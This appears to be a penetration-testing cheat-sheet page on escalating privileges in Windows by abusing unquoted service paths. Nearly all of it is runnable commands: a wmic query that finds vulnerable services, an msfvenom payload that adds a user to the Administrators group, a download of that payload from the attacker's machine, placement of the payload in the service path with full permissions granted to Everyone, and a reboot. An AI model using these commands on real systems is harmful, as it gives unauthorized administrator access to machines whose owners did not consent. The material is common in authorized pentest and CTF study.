Windows PrivEsc with Unquoted Service Path
Last modified: 2023-02-08
A service path with unquoted and spaces might be vulnerable to privilege escalation.
In target machine, find unquoted service path.
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\Windows\\" | findstr /i /v """ "
Also query the configuration information for a service.
sc qc "Development Service"
For instance if the service path is "C:\Program Files\Development Files\Devservice Files\Service.exe", we can place the exploit to "C:\Program Files\Devservice.exe" by ignoring paths after a space.
In local machine, create a payload using msvenom.
Replace "victim-user" with the target user who we can access to.
msfvenom -p windows/exec CMD='net localgroup Administrators victim-user /add' -f exe-service -o Devservice.exe
Now transfer the payload to target machine.
Invoke-WebRequest -Uri http://<local-ip>:8000/Devservice.exe -OutFile .\Devservice.exe
Then place the payload to the path where we've found in investigation.
mv .\Devservice.exe '\Program Files\Development Files\'
icacls 'C:\Program Files\Development Files\Devservice.exe' /grant Everyone:F
Restart the target machine, then the victim user should have an administrator's privilege.
# Restart shutdown /r /t 0 # or PowerShell's command Restart-Computer